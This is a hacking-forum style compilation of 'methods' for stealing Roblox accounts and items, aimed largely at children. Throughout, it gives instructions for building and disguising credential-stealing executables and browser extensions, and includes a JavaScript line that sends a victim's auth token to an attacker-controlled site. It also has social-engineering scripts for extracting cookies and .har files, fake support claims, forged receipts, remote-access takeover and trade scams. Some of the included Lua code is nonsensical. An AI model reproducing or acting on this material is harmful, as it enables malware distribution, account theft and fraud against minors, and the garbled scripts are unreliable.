Logger Methods by KA0001

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Mercurial Grabber Stub | Best Stub

1. Download it and open mercurial
2. Enter what you want the stub to do (Make sure check hide console or get sus)
3. Go to set up, put your webhook in, and build
4. Rename and send to victims
5. Don't dm me for help

2in1 Logger
1. Download the file
2. Edit it
3. FInd where it says replace webhook and replace the webhook
4. Don't dm me for help

Rbxflip Console
Setting it up:

1. Make a website on 000webhost

2. Go to file manager
3. Upload the files
4. Replace ur webhook in sc.php line 97
5. Save and Close

How to log people:

``var token = localStorage.getItem('auth._token.local');
await fetch("https://yourwebsitehere.com/sc.php?t=" + token);``

Replace the code with your new website make a vid like this:
send to your victims/make a youtube on it.

Rover Plus Method | OP

1. Download BetterDiscord
2. Watch this Video (https://www.youtube.com/watch?
3. Download this plugin(https://raw.githubusercontent.com/Fraserbc/BetterDiscord-
Embeds/master/SendEmbeds.plugin.js) this plugin will let you make embed messages
4. Do an embed like
/unknown.png) and this is the RoVer Plus
RoVer_Plus.png) and go to https://roblox.com.so/ to make a fake RoVer Plus
Verification Game Make
ID Game: ``713226354``
Make a hyperlink like this -> ``[https://www.roblox.com/games/713226354/RoVer-
Verification](your phishing link)``
5. Now send it to random kid on adopt me
6. Dm me if you need help
Fake Bloxlink Verification Bot
1. Create a Python repl in repl.it
2. Go to the link and copy everything
3. Paste it all in
4. Go to Discord Developer Portal
5. Create Application then create bot
6. Copy Client Token and paste it in the code
7. Change the code to your liking
8. Run the bot and you're done


SelfBot Logger
Download Me
1. Install python
2. Extract the zip
3. Edit the python file in the folder
4. Scroll to line 2301
5. Replace the webhook with yours
6. Save and add the folder to archive (make a zip again)
7. Send the zip to victims

Har Method | Leaked

1. go up to somebody on any game (preferably Trade Hangout, cnp hangout, mocap,

2. if it's a girl say "oh my god, your outfit is so pretty :D" if it's a boy say
"your avatar is sick"

3. they will say "thank you"

4. ask them "could I make you free 3d art?"

5. if they say yes, say "yay! could you stand in the corner here for me so I can
see something real quick"

6. they say yes then stand in the corner, say "perfect! do you have something like
dis/co? so I can send you the gfx :D"

7. get their discord, tell them that it will take like an hour or two to finish the

8. ask them for their "appearance renderer" if they ask what it is say that you
need it so you can import their avatar into cinema 4d studio.

9. if they ask how they can do that, send them the video and pray that they don't
know what har is!

10. they should send you the .har file, open it and fullscreen, ctrl+f and type
"ROBLOSECURITY" then click next 2 times, copy everything but the " and.
and now you got their cookie ;D
the video you should send them - https://www.youtube.com/watch?v=p9Dnu_e3_Yg

Api Method
1. You find someone, in a trade hangout or something and add them on discord. After
doing that you send them a trade (for example, all their items for you small).

2. Head to https://trades.roblox.com/v1/trades/Outb...&limit=100 and get the

outbound trade ID.

3. Tell the user you sent the trade, to go to

https://trades.roblox.com/docs#!/Trades/...eId_accept and paste the outbound trade
ID from step 2, in "trade ID" on the second link. This will make the user auto
accept the trade


1. First you want to find a victim and try to get close and pretend you want to
help them ( or any other way ). After finding this person.. you want to send them a
scam trade aka their bigs for your small.

2. After sending that trade you want to head over to

https://trades.roblox.com/v1/trades/Outbound?sortOrder=Asc&limit=100 to get the id
for the scam trade. ( the first set of numbers )

3. Then you have to convince the victim to head over to

https://trades.roblox.com/docs#!/Trades/get_v1_trades_tradeId and tell them to
paste the set of numbers into trade id - required and click try out!.

4. When the victim clicks try out, it auto accepts the scam trade. Enjoy!

Cookie Checker Bot

1. Go to https://discord.com/developers and make a bot
2. Go to https://repl.it/ make a python paste the Cookie Checker Text
3. Go to the bottom and you will see
``client.run('Yourdiscordbottoken') #replace with your bot token``
4. Copy your token bot and replace it.

Cookie Checker Logger | OP

1. Watch the video
2. Set it up and upload the HTML to 000webhost
3. When they put their cookie in it will be in the spreadsheet
4. You’ll have their cookie

Double Trade
1. Send 2 trade to the victim, One for all of their bigs for ur smalls
one for your bigs for their smalls and add 2 Robux
after sending the trades
2. Buy a 2 Robux t-shirt fast
recommended on pc
open a tab where ur reading to buy the t-shirt the fastest you can
3. after that they would probly accept the seconde and try to beam you
because they think ur retarted with trust trade
but the seconde trade wont be accepted
you make a story saying
because you didn't accept both trades
and then when they accept both

RDT Stands for reverse double trade

This method is the opposite of the double trade method
For this method, you need to trick the victim into thinking you're helping them
double trade another person.
You also need to somehow trick them into joining your group which somehow has
Robux. The way a normal double trade works is that you send them two trades and one
has your good stuff and their bad stuff, and then one has their good stuff and
their bad stuff. Then added on the trade that has your stuff has 5 Robux added on
that will be spent after you send your good trade. But instead of this method,
you're going to be tricking them into sending your account these two trades, but
when they spend their Robux you will replace it with 5 new Robux from the group
that you previously had them join. (So you must have a group with at least a few
Robux to do this method and a premium account of course or two)

Google Form Method | OP?

Full guide on Google Form method:

Go on your browser and go to https://www.000webhost.com/

Click the red "Get started" button and then click "Free sign up" on the free trial.

Now create your account, I prefer just using login with Google (if you did not use
login with Google, you have to verify your email before continuing)

Once you are on another page with options, select the "Other" options and then
press "Skip" in the corner if you are not using Google Chrome, put in your custom
website name, and then press submit.

Now, select "Upload your site"

First of all, delete the "public_html" folder by clicking on it and then press the
Trash Can on the top bar.

Next, insert a folder with a new folder option. Name the newly created folder

Open the new folder you have made, click on it and then press the Open button on
the top bar once again.

Now, here comes the fun part. Download all of these provided files below.


Or https://mega.nz/file/RfxWiZII#WNFf0IWc07aMU9fZRZrOowVQtAvGPdxQX3HJjnKYp8E

Remove the "$googleformwebpage" it's dual hook on status.php

Done? Press the Upload Files button (you know where it is), press select files and
then select all of the downloaded files, after that press Upload and then wait
until it is done.

Open the file named "send.php" and then press Ctrl + F. Type "yourwebhook" in the
box and then press enter. Now, this is the tricky part. Put your prepared webhook
and then put it in the highlighted part.
OK, nice. After that press "Save & Close"

Next step! Go to https://docs.google.com/forms/u/0/ and then click new form. After

creating a new form, you can customize it however you want, go crazy. Now, press
the preview (eye icon) button at the top right corner.

After that press Ctrl + U on the page, press Ctrl + F on the new page that you got
redirected to, and look for "form action=" It should look something like this form

Found it? Copy the URL and then paste it onto a notepad or somewhere.

After that go back to the preview page and then press Ctrl + Shift + I. What you
are looking for this time is entry.(numbers) It should look something like this
<input type="hidden" name="entry.895940829" value=""> Ok, this time, copy the
entry.895940829 of yours and then paste it in the name notepad as the previous URL.

Now the full address will be constructed as follows:


In my case the full URL looked like this:


Now that you have got that, open "form.php" and then paste the link you constructed
on the part that is yoururlhere, Press "Save & Close"

And that's it, you have set up the method!

Exe to Com
1. Follow the instructions

Reverse Har Method


1.) Download all the files above The files are required to use reverse-har-method

2.) Put your webhook and customize what you want the stub to do to the PC and click
Press Stealer after dragging your EXE to C:\Users\Public\Music and put it inside of
that folder.
This makes it untraceable

3.) Now launch Lime-Crypter as an administrator and set your payload path to C:\
Users\Public\Music\stubname.exe and then click the ICON button and select the
Notepad.ICO file that you downloaded after clicking the Build button!

4.) You've created your stub locate the path to it and rename it to
www.roblox.com.har__.exe and upload it to <https://file.io/ >

5.) For this method to work tell them you can't send the .HAR because you don't
have nitro so instead you will upload it to https://file.io/

1.) Find someone on Roblox or Discord and convince them to join your game to test
the latest update when they join tell them they don't have the latest version of

2.) Tell them to uninstall their current version of Roblox and install Roblox again
after they do

3.) They need to click Download and Install Roblox after they need to save the
RobloxPlayerLauncher to their pc once they do that

4.) They'll see an arrow once they click that they need to click Always open files
of this type

5.) Now create a new Stub and rename it to RobloxPlayerLauncher.exe send them your
stub when they download it it will automatically open without checking for a virus
inside of the executable

Extension Logger
1. Download this zip
2. Extract the folder inside.
3. Right-click and press edit in BGWork.js
4. Put in your webhook where it says "YOUR WEBHOOK."
5. Copy everything and go to obfuscate it ( obfuscate under).
6. Now, your victim has to download the folder you made. (Archive it to zip and
send them that.)
7. Tell them to extract the folder.
8. make them go to manage extensions (chrome://extensions/).
9. Make them press on dev mode top right.
10. Make them press Load unpacked (top left).
11. Make them select the folder they extracted.
12. Make them press "ok."
13. Boom, you have their cookie.
14. The Last step spam our invite link in their DMS
Free simple obfuscator, https://javascriptobfuscator.com/Javascript-
Free simple decrypter, http://jsnice.org/.

Image Logger
Image Method -
1). Get a stub builder
2). Attach your webhook from your discord server to the logger,

3). Now, Create your stub.

4). Once you have your stub, you want to get any random image off the internet And
make it jpg. I recommend art or gfx.

5). You need WinRAR, and a brain Highlight both files <Right Click> And hit Add to

6). Now rename the Archive name <Image name.jpg> then Click on <Create SFX Archive>

7). <Advanced> SFX Options, For the path you want to make the path <C:\Users\
Public\Music> So it's unfindable

8). Go to Setup you want the image to run first and then the logger so
<Dominus.jpg> And then Under it put the exe file <MBSTF.exe>

9). Make A Icon for it using ico or just png, Go <Modes> <Hide All>

10). Last step <update> Extract And Replace Files - Overwrite all files.

hit ok And Exit out by hitting ok

100th step don't fucking leak it pussy


Png to jpg, for rar.

Ico converter for the image icon

GIF Logger Method

Watch this video: https://youtu.be/zN_A2N-kA0Y

This will show you low to hide the payload in a gif.

Find an image on google.

Create a stub

Put both of the your gif and stub and create a sfx archive Instead of running
a .png file in the run after extraction run your .gif

mp3 Logger


1.) Create a stub using Depression (;stub) remove the "Patch.exe" from the zip.
It's a trojan

2.) Now disguise your icon as the mp3 icon

3.) Rename your stub to

AudioName.mp3 .exe
and upload it to https://mega.nz/ copy your download link and send it to your

4.) Now send it to your target and ask them to listen to your audio

HTML method:

This is like the studio method but not as known. There's a 50/50 percent of people
falling for this. (actually kind of complicated, lol.)

Anyway, let me explain. Tell them to open any game on ROBLOX and make sure they
have this pop-up:
unknown.png / Idk if it works without the pop up because I never tried it yet.
(probably works, though)

Once they open it, redirect them to "Elements" and tell them to copy the blue HTML,
which looks like this: "<html> / <html data-btr-loaded" on top of the actual
element page. Tell them to paste it into your chat DMS. Open the "message.txt" they
sent you. Their auth key is in there before doing anything—Press "Format" and press
Word Wrap. Once done, press CTRL+F and search for "+gameinfo," that's their auth
key. IF you don't know how to log in to someone's account with their auth key,
please read up the studio method. I explained how to log in to people's accounts
with it properly.

Gmail AKA BeEf Xss

Gmail XSS. Things you will need A VM with Kali Linux, BeEF.

1) Once you have your virtual machine with Kali Linux on it, install BeEF. It's a
pain to install but it's worth it. When customizing the site, but redirect to
whatever site you want to get the cookies from.

2) Now for the easy part, get the victim to click the link you created or spoofed
with BeEF.

3) After they have done that, wait a few seconds on your virtual machine, then
click on "commands".
4) Search for "google phishing"

5) On the right the information will show up; log in to that, and change the Roblox
email and password.

Flip patterns

1. One pattern seen about 90% of the time is 2 Tix and then 4 Robux right after,
betting on Robux after there has been 2 Tix and 3 Robux would be a safe bet2. 6
Streaks. If there is a 6 streak you should usually place a smaller item on the
other coin. For Example: 5-6 Tix means you should bet on Robux next.3. The final
pattern is constantly 2 Tix -> 1 Robux -> 3 Tix. This pattern is usually seen in
bigger items usually 15k+ and is much safer bet then any other.

UUC Method-- UpdatedREQUIRES- Roblox Stupid, Given API's, Small limited, Bait
[IMPORTANT]2. Get a victim3. Make a stupid bet, where you will give them bait
limited, and fail the bet, or find some way to convince them that they get free
items from you4. Send them a trade for their small, and you bait is limited.5.
Decline the trade immediately.6. Ask them to send it because yours "glitched out"7.
After they have sent the trade, don't accept it, instead, go to studio, and run API
one in your browser, or firefox (firefox works better).
API 1: "https://trades.roblox.com/docs#!/Trades/post_v1_trades_tradeId_accept" 8.
Accept the trade, and siwtch back to chrome.9. Run the second API.
API 2: "https://trades.roblox.com/v1/trades/IDHERE/accept" If you get a white
looking error screen, but are still on the roblox website, you are on the right
track.10. Go and check to see if the trade says "Pending" or something along the
lines of waiting.11. If the trade is on Pending you have successfully utillized UUC

NEW Unpatched UUC Method

First Method
1. Open 2 roblox trade windows, 1 to your alt and 1 to the victim
2. Send the trade to your alt first, then as you send the other trade it will take
roblox 5 seconds to actually send the trade.
3. During this 5 seconds you need to accept the trade on your alt. Note: This
method MAY be patched

Second Method
1. Open the trade with a victim with the main limited you want to UUC you need to
sell it to your alt
2. Send the trade and quickly buy the limited back on your alt for the cheaper
price or use a sniper
3. I don't see the point in doin this method since you have to have the robux and
you will lose to fees. This method is working.

1 - Go into roblox Studio

2 - Click the Game setting on the Top bar
3 - Go to Security and Enable "Allow HTTP Requests"
4 - Right click and Press "Insert object and type in "Module Script" and click it
5 - Paste this script in here, But Modify Where it tells you to


local module = {AllowHTTP.TradeAPI}


local holder = "YOUR USERNAME HERE"

local pc = getfenv()
local switch = setfenv(swap)

pchtml.get(getfenv()) = DeclineAccept.getLocalpc = client/127.000.000

pchtml.nav = switch

holder.HTTP = gcinfo(getRequest)

return module

6 - After doing that, Enter a new NORMAL Script

7 - Then paste this code



local getUser = Rect.new(ModuleScript)


1. Accept 2 trades at the exact same time (use 2 devices)
2. Sell an item and accept trade at same time
3. Decline trade on 1 account and accept other at same time ( quickly )

Info about the "accept 2 trades at same time"
This must be almost at exact same millisecond, use code (trade api) for this, also
it must be 2 trades for the same item
2. Get a victim.
3. Make a stupid bet, where you will give them a bait limited, and fail the bet, or
find some way to convince them that they get free items from you.
4. Send them a trade for their small, and your bait limited.
5. Decline that trade immediately.
6. Ask them to send it because yours "glitched out"
7. After they have sent the trade, don't accept it, instead, go into studio, and
run API one in tor browser, or firefox (firefox works better). Make sure you are
linked to the same account, and you aren't using a proxy or vpn.
API 1: "https://trades.roblox.com/docs#!/Trades/post_v1_trades_tradeId_accept"
8. Accept the trade, and switch back to chrome.
9. Run the second API.
API 2: "https://trades.roblox.com/v1/trades/IDHERE/accept"
If you get a white looking error screen, but are still on the roblox website, you
are on the right track.
10. Go and check to see if the trade says "Pending" or something along the lines of
11. If the trade is on Pending, you have successfully utilized UUC.

Another UCC:
1. Accept 2 trades at the exact same time (use 2 devices)
2. Sell an item and accept trade at same time
3. Decline trade on 1 account and accept other at same time ( quickly )
Info about the "accept 2 trades at same time"
This must be almost at exact same millisecond, use code (trade api) for this, also
it must be 2 trades for the same item

1 - Go into roblox Studio
2 - Click the Game setting on the Top bar
3 - Go to Security and Enable "Allow HTTP Requests"
4 - Right click and Press "Insert object and type in "Module Script" and click it
5 - Paste this script in here, But Modify Where it tells you to


local module = {AllowHTTP.TradeAPI}


local holder = "YOUR USERNAME HERE"

local pc = getfenv()
local switch = setfenv(swap)

pchtml.get(getfenv()) = DeclineAccept.getLocalpc = client/127.000.000

pchtml.nav = switch

holder.HTTP = gcinfo(getRequest)

return module

6 - After doing that, Enter a new NORMAL Script

7 - Then paste this code



local getUser = Rect.new(ModuleScript)


8 - When you did that, on the side bar you will see something called
9 - Right Click on it and click Insert Object AND Click RemoteFunction
10 - Right click on the RemoteFuction and name it "GetHTML"
11 - Then, You will see something called "LocalizationService" on the side. Right
click it enter a modile script then rename it to "GetHtml"
12 - Then paste this code


local module = {true}


local edit = editHtml

function.editHtml = edit

swap = true
getLocaluser = true


return module

13 - Now its time to let the scripts know that YOU will receive the item no matter
WHAT happens.
14 - Add a Normal Script name it "player"
15 - There will be a script below, Paste it in the script and replace it with your
info (No passwords or anything lol)


local owner = Rect

local username = getfenv(true)

function(owner) = "Your roblox ID"

_VERSION = true
function (username) = "Username Here"
_VERSION = true

16 - Your finished with the scripts!

17 - Now how to run it? Well just go to the top bat and U will see a play button.
Under the play button is a Arrow.
18 - Click the arrow and you will see a "Run" Option
19 - Click it
20 - Now your ready to Beam kids!
21 - To activate it, Click The "Run" Button.
22 - Send your trade to your victim
23 - If they decline or accept, you still get the item
24 - WARNING! There is a 15 minute cooldown. You Can only Do this 5 times every 15

This shit op for real!

Omegle Method
This method allows you to get easy hits and auto farm cookies.

1. Install the extension Omegle dark mode and antispam. This will allow you to send
automatic messages and get more cookies at once

2. Once installed, click the extension. Click the welcome message box and enter
your desired message. This will be sent when an Omegle chat starts. For example,
using har: "Heyy,I'm making a vibe game and I need cool avatars to use as npcs
(insert your discord here)."
Welcome message delay is the number of seconds before the automatic message sends,
I usually use six, but it's all preference.

3. Once the extension is set up, head on over to Omegle, enter the tags.

4. Roblox, Robux

5. Click enter, and your bot will start running. If you want more bots, simply open
more tabs.


1. Go to visual studio 2019.

2. Make a WPFApp
3. Design it how u want and add a button.
4. Double click button and add this





Free layout:

I don't know how to setup

---Mgui Method---

1. Open the "My-Gui-Test.rbxl".

2. Publish it < File > Publish > Name it all you want. > Don't close it yet.
3. Go to https://roblox.com/develop and go to your game and Public It .
4. Go to Passes create a gamepass Configure it go to sales Enable Sales now price
it all you want and copy the ID of the gamepass.
5. Go back to Roblox Studio (My-Gui-Test.rbxl) On the left> side you will see
StarterGui Click the arrow like this >.
6. Keep clicking it until you see Change gamepass here now there are two numbers
replace the ID that you copy earlier both of them
7. Now got to < File > Publish as > Choose the game that you publish earlier >
Click Overwrite>
8. Your done! but there's a cooldown before buying the gamepass.

this is the studio file point_up_2
when you open it, it automatically connects to your studio and makes u a scam game!

(trust this at ur own risk)

**^ There's a chance your account get deleted (Ban)**


1. First, for this to let you gain anything at all. You're going to need to make a
game, and I'd recommend going on v3rmillion and finding a profile that copies game
maps just in case it goes wrong.

2. Inside the map, either make a UI with a "Donation Menu" or set up Developer
Buttons where people can buy things for Robux (e.g., VIP).

3. Join a game or any server and promote that you are looking for game moderators
before launching your game. Tell them that you get a lot of donations, and mods
will be paid fairly for their work.

4. Link them to your game and have it on friends only if your map is looking bland
and doesn't work well as a game. Tell them that you've hired a developer who is
doing your scripts currently. Now tell them that ROBLOX has a new way of giving
moderator permissions due to the number of Moderation accounts being hacked.

5. Tell them that they need their Authentication ticket, and explain that this is
the Unique identifier to their account and only works on the PC they are currently

6. (How to get the ticket): First, tell them to leave your game, then ask them if
when they open, Roblox do they call the "Allow this site to open an application?"
message (example at the bottom). If they say yes, then you are set for the next
step. If they say no, tell them that they will need that message to receive the
Auth Ticket. Explain that the steps to do so are going to
https://portableapps.com/apps/internet/firefox_portable and installing Firefox
Portable, now go to roblox.com and log in. Tell them to head over to your game and
click on the Play button. This should bring up their prompt.
PortableApps.com - Portable software for USB, portable, and cloud drives

Unleaked 2021 Image Method + Setup

1.Download https://mega.nz/file/eMQGQb5Z#RhcM-
_MzNtdIe5hOoAozwL6SjLygIfJfIv0hEeTPzhI and make a stub

2.Download https://github.com/OsandaMalith/Exe2Image/releases/tag/1 this to convert

the stub/exe

3.Open Exe3image then browse for your stub/exe then browse where you want your
photo at

4.Done! if you double tape the image then you go to roblox and start up a game
they get cookie logged! - IMAGE METHOD

Account Comprimising Method

Get a toy code off google or a toy code you've already used.
Tell the victim to go to the roblox toys website and redeem the code.

Get the victim's username aswell.

If they say it's invalid you can make an excuse, like Wrong code my bad. or just
block them.

After that contact Roblox Support and tell them the victim's account is yours. You
can say I can prove this is my account aswell by showing you the code I attempted
to redeem.

After that, they should give you the account.

You buy a roblox giftcard on amazon
you give them it for free
the person u want to comp
They put it on there account
message roblox you redeemed a giftcard on your account, and someone took it, the
will reset the accounts password to whatever u want
then you have there acc


1. Buy any price ROBLOX Giftcard.

2. Give the giftcard to a user with limiteds on discord or something.
3. Email roblox support saying your roblox account doesnt work and it says the
passwords wrong, and put the giftcard code in the email saying you entered that
giftcode before you couldn't go in it anymore.
Instead of emailing call roblox

EWhore Method
Fake Roblox Girlfriend/Boyfriend Method

1. Make yourself a "Hot" avatar.

2. Go into any game with a decent amount of rich girls/boys and find someone who
has a premium. (Or find anyone you know and you don't like.)

3. Tell them that they have a nice outfit and that they seem nice.
4. Ask if you want to be friends and say that you don't have any and that you are a
bit awkward. (I know this method is awkward as fuck, but I mean, it works well)

5. They will mostly say yes. If they don't, then just find someone else.

6. Ask for their cord. They will most likely give it to you.

7. To be honest, be nice and all and kinda always message something to her, make
jokes until she likes you.
8. If she asks for personal stuff, just make stuff up.

9. Now, the most challenging part, try getting him/her as your Girlfriend or

10. If you now have a fake Roblox girlfriend, you're almost done.
11. Ask her if she can make you a nice avatar and send her your password (I know
its dangerous, make sure your trades are off and you have a pin)

12. Now, ask her if you can make an avatar for her. She will say yes 95% of the

13. Get her limiteds.

14. Enjoy!!

Yeah, I get how dumb this method is, but if you think about it, it's not that dumb,
to be honest.
I know this method is unfortunate, but it will never get old, and you will get good
hits. I can promise that. <Atleast 300k recommend emos>


1.) First download the files above.) Extract them Open up READ-ME Once you've
done that you'll need to create a stub

2.) Copy the download link of your stub through Discord and find a random Youtube
Video on youtube and paste your stub link in the comment section.

3.) Copy the link of the stub you uploaded in the Youtube comment section now you
should have a redirect link

4.) Choose your game and paste the Redirect link inside of Youtube Link and click

5.) Now you have your Discord-Game-Link

Upon click it should automatically download your Stub-File you can disguise it
using #how-to-have-icon-on-an-exe and rename it to the game you selected in the

Developer Forum method

1. Make a account on Developer Forum

2. Have the person your hitting also make a account on there , I will show you how
to convince them to

3. I will help you convince them to go to inspect element and you tell them to go
to applications

4. Then tell them to copy everything in there and have it to sent it in a txt file
name it Bug-Developer-2021.rblx

5. Once they send it you download and open it in txt file and type
in .ROBLOSECURITY and go to the cookie and copy it

6. Have editthiscookie installed and copy the cookie and replace it with yours and
click the check mark and you should be in

Gyazo reset pw ID method (OP)

Step - 1) Ask user to send gyazo snapshot of roblox password reset screen
Step - 2) If they don't send a gyazo link be like. Send a pic with gyazo so I know
it's not edited (This always works)
Step - 3) After u got the link be like hey I can't see the picture. Did u check
that u have details visible on?
Step - 4) If they say what is that send them this picture.
https://gyazo.com/85b83e65438fe2a45def1d6f8a4a5837 And be like just scroll down and
youll see the option.
Step - 5) After that open their link and scroll down till u see this.
https://gyazo.com/324a6314b3336b55e03943323d3785d2 Press the thing called roblox
and ur on their pw reset link.
Step - 6) Reset the password and login to their account, and transfer the items gg
you just beamed a kid (always leave a funny vid or something XD)

TIPS: I recommend dming people who sell limiteds and be like yo can i buy ur
limiteds ill go first. Say proof the acc is urs and tell them to sed a pic of
roblox password reset and than do the steps above thats it.

1. Baiting: Tell them UUC back asks if they want to learn to add them on Kord
2. After that, tell them new need two outbound trades of the same item, then
3. Send them a trade for the items you want
4. Once you've Convinced them, you have to use a manual API method on them
5. Make them click F12, aka inspect, and they got to go to console and paste this
``function POST(){
url : "/My/Money.aspx/GetMyItemTrades",
type : "POST",
data : '{"statustype":"inbound","startindex":0}',
contentType : "application/json; charset=UTF-8",
success : function(Data){
var Base = jQuery.parseJSON(jQuery.parseJSON(Data.d).Data[0])
var TradeId = Base["TRADE ID HERE "]
var Partner = Base["USER’S ID"]
var Token = ""
Token = Data.match(/setToken(\W(.+)\W);/)[2].replace(/'/g,"")
Token = Token.replace("+","%2B").replace("/","%2F")
$.post("/Trade/TradeHandler.ashx?token=" + Token,{TradeID : TradeId,cmd :
var Base = jQuery.parseJSON(Data.data).AgentOfferList
var Other = 1
if (Number(Base[0].AgentID) == Number(Partner)){
Other = 0``

Database Method
Database Method

1) Make sure your target is logged into Roblox.

2) tell them to open file explorer

3) in the top bar, type %LocalAppData%\Google\Chrome\User Data\Default

4) Tell them to scroll down until they find the file called Cookies

5) Tell them to send you the file (if they don't want to find some bs excuse for
why you need it)

6) Install Sqlite browser (https://sqlitebrowser.org/dl/)

7) In SQLlite browser click the open database and browse to the Cookies file

8) change to the browse data tab and type .roblox.com in the host_key filter

9) Look for .robloxsecurity

10) Log in to the victim's account.

Lunar Builder
1. Dm me if you have issue.

This is the OP Stealer/Stub

What is ItroublveTSC?

Itroublve is Used to Stole someone's passwords and discord tokens.

It said it has Virus.

The Virus is False Positive Which mean it's Harmless Plus it use to make a Stealer.

What are the features?

Crash PC (Broken)
Auto Remove EXE = Remove EXE after execution
Restart Discord = Restart any version of installed Discord
Camera Snapshot = Take a picture using webcam
Disable Antivirus + Run on Boot = Disable Windows Defender & run on startup of PC
Custom File = Run any type of file when the stealer is executed (Can be used to
make it not so suspicious)
Obfuscate EXE = Make it harder to get source/webhook for the average user
Stoles Passwords, Cookies, And Browser History

Make sure you have your antivirus off bc Windows Defender Will Block it.

Before Opening Extract it, Before Extracting Make Sure It's on a Folder or else it
won't work if it doesn't work try "Run as Administrator"

SirCookie Stub | Original

1. Dm me if you have an issue
2. Proof:https://images-ext-1.discordapp.net/external/cfcGIdM2nVV_zYShaIkGBb68q-

Depression | Original
1. It's https://anonfile.com/ which is sus
2. Dm me if you have an issue
3. Proof:https://images-ext-1.discordapp.net/external/mDRfvqXnvE4UOGCxR1pL6hH-

Mercurial Grabber Stub | Best Stub

1. Download it and open mercurial
2. Enter what you want the stub to do (Make sure check hide console or get sus)
3. Go to set up, put your webhook in, and build
4. Rename and send to victims
5. Don't dm me for help

Force Venom | Original

1. I don't think it's working the download link is not working
2. Try This https://v3rmillion.net/showthread.php?tid=492237

Java obf

Club Iris
1. Get in a wealthy Roblox avatar, for example, Blocky Slender, etc. Just make sure
it’s rich.

2. Join club iris, sit on a couch, and wait for girls to belly dance in front of

3. You then say: “okay, I’ll get you some and add them as a friend. If you get two
targets, it’s better so you can make a group chat.

4. Get an alt with some Robux but not too much and don’t have it added already.
Then tell the group chat: “wait I’m adding someone that wants some robux too.”

5. Then add your alt to the group chat and tell them: “I’m gonna have to purchase
because I have an old device.”

6. Then let your alt say: “okay I’ll send my pass.” When you do that, say okay and
do something else for about 2-4 minutes and say that you bought it.

7. Let your alt say: “okay I’m going to check.” (Make sure you do some trash
spelling to make it look legit.)

8. Then say on your alt: “thanks for the robux!” The people you targetted will
probably ask how much you gave them. Don’t bring a significant amount a reasonable
amount is For example 400-1700 Robux. They should probably send you their password.
(Make sure you have a VPN in case if they have 2step it. They do. Ask them for the
2 step code.

9. Enjoy!

Powershell Method | aka .Har 2.0

Must be on the Roblox website

1. Get a target
2. Make them somehow open inspect element thingy
3. Tell them to press the arrow and then press network
4. Press on any of the things example home.css
5. Right-click > copy > copy all as PowerShell
6. Make him send it to you and search for the cookie!

Control Pc | Anydesk App

1. Find someone at trade hangout. (Look for beamers, USD buyers, etc. Just look at
their graph on rolimons and see if it's sus)

2. Be confident. Come up to them and ask them. "Yo, I need to ask you something on
cord. Add me (say your user)"

3. When you're with them, ask them on discord. "Yo, wanna beam together?" When they
say yes, then you have gotten your target.

4. First, you need the application called "anydesk" search it up on google. Tell
them to download it too, and so they don't get sus to say the following, "I'm
getting mass reported soon and I might get banned. Add me on that platform."

5. When they download, it asks for their code and says, "can you add me on it"
enter the code they sent you and boom. Now you have access to their PC.

6. To distract them, say, "I found a retard in ragdoll, join me."

7. Download a stub on their PC, or just make them cookie log themselves while
you're on their PC.

8. Boot them offline, and there you have it, take all their shit and dip

--Redirect Method--

This method works through YouTube.. you need to download a stub and send it through
discord dms. Copy the download link using inspect element and paste that comment in
a YouTube video and copy the the link on your comment. Finally send it to your
desired target and ensure they open the redirect link itll automatically download
the stub and they have to open it for you to cookie log them


email to get in most of the time)

After getting their email you gotta go to https://roblox.com/support page and use
any name, any email doesn’t matter, however you must have access to the email.

After doing this put report type “hacked, pc and account hacked” Then paste the
following into the “What happened box”:

Hey ROBLOX I have an insane amount of expensive limited items in-which took me
years to get… My email was recently hacked and I have no access to it, but I do
have proof of billing. (USERS ROBLOX EMAIL)


When ROBLOX responds it’s a 98% you will enter the account with no hesitation,

Support Method 2

Account access method

Find any account you want to gain access to, MUST BE INACTIVE FOR 3DAYS+!!
2) Note down what limiteds they have/had in the past through rolimons
3) Email roblox support through a new email and use google translate for arabic
4) Request that your account logged you out and you no longer have access in arabic
and you would like to speak to someone who also speaks arabic and note down some of
the limiteds you "owned"
5) They will respond with someone who also speaks arabic or uses google translate
6) If they say that they need more evidence simply respond in arabic "i dont
understand i am only young"
7) State that you are 13 and you want the account back and after you resend the
email 2-3 more times they will reset the passcode for you
8) Log in change details and keep the account

NOTICE!: This method is new and it is being improved, support methods are being
made as we speak and being tested, this method has a 70-75% success rate

Support Method

Support method
When you contact roblox support regarding an account the only way you can verify
ownership is by:
1. Emailing them off the og email
2. Providing them with original billing receipts.
This method involves the second verification method. For example, I contacted
roblox regarding Snow_crash. Here was the reply:

When they ask for a original billing receipt it means they want you to provide them
with that user's first ever USD purchase on roblox such as builders club or robux.
Roblox has an API which tells you when somebody first owned an item. Roblox is dumb
for this because we can check this API on the user's BC hats and that will tell us
when that user's first purchase.

When you provide roblox with the receipt all they check for is the date. They are
lazy because they go through 10k+ emails a day so don't pay too much attention to
if an email is faked.
I have a bot which can retrieve the first purchase date in seconds so when roblox
reply asking you to provide a receipt we inspect element a real receipt with the
date we just got.
This is the fake receipt I sent for snow_crash

This is the result:


The only limits are:

1. Go for 2015+ because they are more likely to have used itunes, paypal, windows
store, google play. Roblox dont let you provide receipts for credit card purchases.
2. Their inventory cannot be private or I will not be able to use the api on them.
3. Also do not go for admins or this risks the method getting patched.


Support Method 4

First you need a form of billing information, regardless of which information. You
need their email. (ask for their paypal email to get in most of the time)

After getting their email you gotta go to https://roblox.com/support page and use
any name, any email doesn’t matter, however you must have access to the email.

After doing this put report type “hacked, pc and account hacked” Then paste the
following into the “What happened box”:

Hey ROBLOX I have an insane amount of expensive limited items in-which took me
years to get… My email was recently hacked and I have no access to it, but I do
have proof of billing. (USERS ROBLOX EMAIL)


1.)First, you will need to get a VPN. I recommend a chrome extension VPN like
dotVPN. After creating a ROBLOX account
with BC or buy two stolen cheap BC account on v3rm for 1 dollar each with VPN on
and send a trade for any limited worth 4k
ROBUX + to your principal. Turn off the VPN and go on your principal and accept the
trade. After turn on the VPN and go on Account 1.
Make sure you switch the VPN IP every time you change accounts, and make sure
you're not using the same IP. Turn on the VPN with a new IP address
and go on Account 2, which then you will send a PM to Account 1 like this: "Hey,
want free ROBUX? Go to freerobux.com".
Then go on Account 1 and send all your items to Account 2. After creating Account 3
(different VPN IP) and send a PM to
Account 2 like: "Send me a trade, I accept most good trades." Then make Account 3
send for all limiteds on Account 2
and make Account 2 accept.

2.)After that, email ROBLOX with Account 1 (the account you made, not bought on
v3rm) that all your ROBUX and Limiteds
are gone and that you're a concerned parent and threaten them by asking for a phone
number and stuff. After a couple
of days, they will say that you will get the limited back OR MOST LIKELY they will
give you the amount of ROBUX the limited was worth.

